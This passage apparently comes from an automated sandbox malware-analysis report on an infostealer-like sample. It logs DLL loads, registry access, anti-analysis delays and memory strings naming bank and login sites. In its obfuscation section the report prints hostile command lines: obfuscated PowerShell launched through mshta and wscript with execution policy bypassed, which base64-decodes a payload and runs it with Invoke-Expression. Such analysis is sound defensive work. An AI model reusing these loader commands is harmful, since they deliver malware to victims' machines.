                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: winsqlite3.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                  Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Windows\SysWOW64\ieUnatt.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2201321954.00000000079FB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2472760067.00000000071D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2473355454.000000000767A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ieUnAtt.pdbGCTL source: aspnet_compiler.exe, 0000000B.00000002.2535013598.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.2535013598.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2468178647.0000000001561000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2468178647.0000000001542000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2603447181.0000000001561000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lSomfUdjbC.exe, 0000000C.00000002.4512336904.0000000000DFE000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: ieUnAtt.pdb source: aspnet_compiler.exe, 0000000B.00000002.2535013598.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000B.00000002.2535013598.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2468178647.0000000001561000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2468178647.0000000001542000.00000004.00000020.00020000.00000000.sdmp, lSomfUdjbC.exe, 0000000C.00000003.2603447181.0000000001561000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: q:C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.pdb source: powershell.exe, 00000003.00000002.2198089199.0000000005692000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2537409498.0000000004621000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2535339769.000000000447C000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, ieUnatt.exe, 0000000E.00000002.4513559484.000000000496E000.00000040.00001000.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2537409498.0000000004621000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000003.2535339769.000000000447C000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513559484.00000000047D0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: aspnet_compiler.pdb source: lSomfUdjbC.exe, 0000000C.00000002.4514859333.000000000479C000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4512419516.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000004DFC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002EF7C000.00000004.80000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.2472760067.00000000071D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2473355454.000000000767A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.2473355454.000000000767A000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'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'+[CHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHELL.exE -Ex bYPAss -nOP -w 1 -C DeviceCREdEntiAldEPloYmENT ; InvoKE-eXPRESSion($(invokE-EXpRession('[SYSTeM.Text.EncodInG]'+[ChAr]58+[chaR]0x3A+'utF8.geTsTRinG([systEM.coNvERt]'+[CHAR]0X3A+[ChaR]58+'FroMBaSe64sTRiNg('+[chAr]34+'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'+[CHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $olhento = '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';$amenista = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($olhento));Invoke-Expression $amenista
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.dllJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\ieUnatt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\SysWOW64\ieUnatt.exe API/Special instruction interceptor: Address: 7FFDB442D324
                  Source: C:\Windows\SysWOW64\ieUnatt.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
                  Source: C:\Windows\SysWOW64\ieUnatt.exe API/Special instruction interceptor: Address: 7FFDB442D944
                  Source: C:\Windows\SysWOW64\ieUnatt.exe API/Special instruction interceptor: Address: 7FFDB442D504
                  Source: C:\Windows\SysWOW64\ieUnatt.exe API/Special instruction interceptor: Address: 7FFDB442D544
                  Source: C:\Windows\SysWOW64\ieUnatt.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
                  Source: C:\Windows\SysWOW64\ieUnatt.exe API/Special instruction interceptor: Address: 7FFDB4430154
                  Source: C:\Windows\SysWOW64\ieUnatt.exe API/Special instruction interceptor: Address: 7FFDB442DA44
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 11_2_0109096E rdtsc 11_2_0109096E
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7893
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1678
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3296
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6407
                  Source: C:\Windows\SysWOW64\ieUnatt.exe Window / User API: threadDelayed 2293
                  Source: C:\Windows\SysWOW64\ieUnatt.exe Window / User API: threadDelayed 7678
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe API coverage: 0.7 %
                  Source: C:\Windows\SysWOW64\ieUnatt.exe API coverage: 3.0 %
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6956 Thread sleep count: 7893 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3460 Thread sleep count: 1678 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5948 Thread sleep time: -9223372036854770s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5916 Thread sleep time: -13835058055282155s >= -30000s
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe TID: 3552 Thread sleep time: -45000s >= -30000s
                  Source: C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe TID: 3552 Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 1548 Thread sleep count: 2293 > 30
                  Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 1548 Thread sleep time: -4586000s >= -30000s
                  Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 1548 Thread sleep count: 7678 > 30
                  Source: C:\Windows\SysWOW64\ieUnatt.exe TID: 1548 Thread sleep time: -15356000s >= -30000s
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Windows\SysWOW64\ieUnatt.exe Last function: Thread delayed
                  Source: C:\Windows\SysWOW64\ieUnatt.exe Code function: 14_2_0293BFD0 FindFirstFileW,FindNextFileW,FindClose,14_2_0293BFD0
                  Source: N78Im7H.14.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                  Source: N78Im7H.14.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                  Source: N78Im7H.14.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                  Source: powershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: N78Im7H.14.dr Binary or memory string: discord.comVMware20,11696487552f
                  Source: N78Im7H.14.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
                  Source: N78Im7H.14.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                  Source: powershell.exe, 00000003.00000002.2203096096.00000000089C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                  Source: N78Im7H.14.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
                  Source: powershell.exe, 00000008.00000002.2474478084.0000000007755000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
                  Source: N78Im7H.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                  Source: ieUnatt.exe, 0000000E.00000002.4512419516.00000000029AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
                  Source: N78Im7H.14.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                  Source: N78Im7H.14.dr Binary or memory string: global block list test formVMware20,11696487552
                  Source: N78Im7H.14.dr Binary or memory string: tasks.office.comVMware20,11696487552o
                  Source: powershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
                  Source: N78Im7H.14.dr Binary or memory string: AMC password management pageVMware20,11696487552
                  Source: lSomfUdjbC.exe, 0000000C.00000002.4513135714.000000000153E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2823752165.000001CDAEF2C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: N78Im7H.14.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                  Source: N78Im7H.14.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
                  Source: N78Im7H.14.dr Binary or memory string: dev.azure.comVMware20,11696487552j
                  Source: N78Im7H.14.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                  Source: powershell.exe, 00000003.00000002.2203096096.00000000089C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWU
                  Source: N78Im7H.14.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                  Source: N78Im7H.14.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                  Source: N78Im7H.14.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                  Source: powershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
                  Source: N78Im7H.14.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                  Source: N78Im7H.14.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                  Source: N78Im7H.14.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
                  Source: N78Im7H.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                  Source: N78Im7H.14.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                  Source: N78Im7H.14.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                  Source: N78Im7H.14.dr Binary or memory string: outlook.office.comVMware20,11696487552s
                  Source: N78Im7H.14.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                  Source: N78Im7H.14.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                  Source: N78Im7H.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                  Source: N78Im7H.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                  Source: N78Im7H.14.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                  Source: powershell.exe, 00000003.00000002.2201321954.0000000007A57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWHM
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process queried: DebugPort
                  Source: C:\Windows\SysWOW64\ieUnatt.exe Process queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 11_2_00417063 LdrLoadDll,11_2_00417063
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 11_2_010FE10E mov eax, dword ptr fs:[00000030h] 11_2_010FE10E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D2349 mov eax, dword ptr fs:[00000030h]11_2_010D2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D2349 mov eax, dword ptr fs:[00000030h]11_2_010D2349
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D035C mov eax, dword ptr fs:[00000030h]11_2_010D035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D035C mov eax, dword ptr fs:[00000030h]11_2_010D035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D035C mov eax, dword ptr fs:[00000030h]11_2_010D035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D035C mov ecx, dword ptr fs:[00000030h]11_2_010D035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D035C mov eax, dword ptr fs:[00000030h]11_2_010D035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010D035C mov eax, dword ptr fs:[00000030h]11_2_010D035C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F8350 mov ecx, dword ptr fs:[00000030h]11_2_010F8350
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_010F437C mov eax, dword ptr fs:[00000030h]11_2_010F437C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107438F mov eax, dword ptr fs:[00000030h]11_2_0107438F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0107438F mov eax, dword ptr fs:[00000030h]11_2_0107438F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104E388 mov eax, dword ptr fs:[00000030h]11_2_0104E388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104E388 mov eax, dword ptr fs:[00000030h]11_2_0104E388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0104E388 mov eax, dword ptr fs:[00000030h]11_2_0104E388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01048397 mov eax, dword ptr fs:[00000030h]11_2_01048397
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01048397 mov eax, dword ptr fs:[00000030h]11_2_01048397
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_01048397 mov eax, dword ptr fs:[00000030h]11_2_01048397
